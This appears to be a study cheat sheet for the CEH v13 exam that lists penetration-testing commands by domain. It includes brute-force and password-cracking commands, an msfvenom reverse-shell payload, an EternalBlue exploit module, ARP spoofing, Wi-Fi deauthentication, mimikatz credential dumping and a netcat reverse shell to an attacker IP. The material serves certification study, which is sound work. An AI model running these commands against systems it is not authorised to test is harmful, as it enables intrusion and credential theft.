CEH Command Cheat Sheet (2025 Edition)
Master the Essential Commands for Your CEH v13 Exam and Real-World Ethical Hacking
🔍 Introduction
Whether you’re preparing for the Certified Ethical Hacker (CEH) v13 exam or sharpening your pentesting skills, having the right command at your fingertips can make all the difference.
This CEH Command Cheat Sheet (2025 Edition) gathers the most frequently used commands across the key CEH domains—so you can quickly reference, visualize, and practice them in labs or real-world assessments.
Back2Skills’ approach focuses on visual, beginner-friendly learning, so this guide is also infographic-ready—ideal for transforming into Canva slides or printable study sheets.
🧩 1. Information Gathering & Reconnaissance Commands
| Tool | Purpose | Command Example |
|---|---|---|
| whois | Retrieve domain registration info | whois example.com |
| nslookup | Query DNS records manually | nslookup -type=ANY example.com |
| dig | Detailed DNS lookup | dig example.com ANY +noall +answer |
| theHarvester | Collect emails, hosts, and subdomains | theharvester -d example.com -b google |
| Shodan | Find exposed devices and services | shodan search apache port:80 country:US |
🧠 Pro Tip (CEH Tip):
Know how to perform both passive and active reconnaissance—the exam often tests command syntax differences.
⚙️ 2. Scanning & Enumeration Commands
| Tool | Purpose | Command Example |
|---|---|---|
| nmap | Host discovery and port scanning | nmap -sS -p 1-1024 -T4 example.com |
| rustscan | Fast alternative to Nmap | rustscan -a 192.168.1.0/24 |
| enum4linux | Enumerate Windows shares and users | enum4linux -a 192.168.1.10 |
| snmpwalk | Query SNMP devices | snmpwalk -v2c -c public 192.168.1.1 |
| dnsrecon | DNS record enumeration | dnsrecon -d example.com |
💡 Analogy:
Think of enumeration like “peeling an onion”—each layer (DNS, SNMP, SMB) reveals more internal information.
💥 3. Vulnerability Analysis Commands
| Tool | Purpose | Command Example |
|---|---|---|
| nikto | Web server vulnerability scan | nikto -h http://example.com |
| wpscan | WordPress security scanner | wpscan --url http://example.com |
| nmap | Vulnerability scripts | nmap --script vuln 192.168.1.5 |
| openvas | Network vulnerability scanner | `omp -u admin -w pass -T |
| nessuscli | CLI vulnerability management | nessuscli update --plugins-only |
🧠 CEH Tip:
Understand how to differentiate false positives from actual exploitable vulnerabilities—this concept often appears in CEH MCQs.
🧰 4. System Hacking & Privilege Escalation
| Tool | Purpose | Command Example |
|---|---|---|
| hydra | Brute-force login credentials | hydra -l admin -P passwords.txt ftp://192.168.1.10 |
| john | Password cracking | john --wordlist=rockyou.txt hashes.txt |
| msfvenom | Generate payload | msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe |
| metasploit | Exploitation framework | msfconsole → use exploit/windows/smb/ms17_010_eternalblue |
| hashcat | GPU-based password cracking | hashcat -m 0 hashes.txt rockyou.txt |
⚡ Analogy:
Privilege escalation is like finding the master key inside a building you already entered—it unlocks full control.
🌐 5. Web Application Hacking
| Tool | Purpose | Command Example |
|---|---|---|
| sqlmap | SQL injection automation | sqlmap -u "http://site.com/page.php?id=1" --dump |
| burpsuite | Intercept & modify HTTP traffic | Launch → Proxy → Intercept ON |
| dirb | Discover hidden directories | dirb http://example.com/ /usr/share/wordlists/dirb/common.txt |
| wpscan | WordPress exploit discovery | wpscan --url http://example.com --enumerate p |
| curl | Test HTTP requests manually | curl -I http://example.com |
🧠 CEH Tip:
In CEH Practical, manual testing with BurpSuite and SQLMap is expected—memorize common SQLMap flags (--dbs, --tables, --columns, --dump).
📡 6. Sniffing & Spoofing
| Tool | Purpose | Command Example |
|---|---|---|
| tcpdump | Packet capture | tcpdump -i eth0 -w capture.pcap |
| wireshark | GUI network analysis | (open capture.pcap) |
| ettercap | ARP spoofing | ettercap -T -M arp:remote /192.168.1.5/ /192.168.1.10/ |
| arpspoof | Redirect network traffic | arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 |
| macchanger | Change MAC address | macchanger -r eth0 |
⚙️ Analogy:
Packet sniffing is like listening to conversations in a café—you’re not speaking, just observing.
📶 7. Wireless Hacking
| Tool | Purpose | Command Example |
|---|---|---|
| airmon-ng | Enable monitor mode | airmon-ng start wlan0 |
| airodump-ng | Capture Wi-Fi handshakes | airodump-ng wlan0mon |
| aireplay-ng | Deauthenticate clients | aireplay-ng --deauth 10 -a [BSSID] wlan0mon |
| aircrack-ng | Crack WPA2 passwords | aircrack-ng -w wordlist.txt capture.cap |
🧠 CEH Tip:
Expect CEH v13 labs around WPA2 cracking and Evil Twin AP attacks—practice using Kali + compatible adapter.
☁️ 8. Cloud & AI Tools (New for CEH v13)
| Tool | Purpose | Command Example |
|---|---|---|
| ShellGPT | AI-assisted command generation | sgpt "generate nmap command for all open ports" |
| Tranis AI | Cloud threat simulation | Web interface |
| Malware.AI | Analyze malicious binaries | malwareai scan sample.exe |
| AWS CLI | Cloud service enumeration | aws s3 ls |
| GCP CLI | Enumerate cloud buckets | gcloud storage ls |
💡 Pro Tip:
AI integration is one of CEH v13’s new dimensions—showing you can use AI for automation is a competitive edge.
🧱 9. Post-Exploitation & Reporting
| Tool | Purpose | Command Example |
|---|---|---|
| meterpreter | Post-exploitation shell | getuid, hashdump, screenshot |
| netcat | Reverse shell creation | nc -lvp 4444 / nc [attacker IP] 4444 -e /bin/bash |
| powersploit | PowerShell exploitation scripts | Import-Module PowerSploit |
| Empire | Post-exploitation framework | usemodule credentials/mimikatz |
| Linux privilege check | Find misconfigurations | sudo -l / find / -perm -4000 2>/dev/null |
🧠 CEH Tip:
Always include documentation commands—e.g., history, ifconfig, netstat—for professional reporting in CEH Practical.
📘 10. Documentation & Reporting Commands
| Tool | Purpose | Command Example |
|---|---|---|
| script | Record terminal sessions | script session.log |
| tee | Save command output | `nmap -sV example.com |
| markdown / pandoc | Convert notes to reports | pandoc notes.md -o report.pdf |
| grep / awk | Filter large outputs | grep "open" scan.txt |
| echo / date | Timestamp logs | echo $(date) >> actions.log |
🧾 Analogy:
Documentation is the “ethical” in ethical hacking—it transforms chaos into clarity.
🧠 Key Takeaways
✅ Memorize syntax for Nmap, Hydra, SQLMap, and Metasploit—these appear in most CEH labs.
✅ Combine manual and automated commands for maximum efficiency.
✅ Use ShellGPT to generate and explain commands in context.
✅ Always record your findings—proper documentation is part of the CEH grading.
✅ Practice with platforms like TryHackMe and Hack The Box using these exact commands.

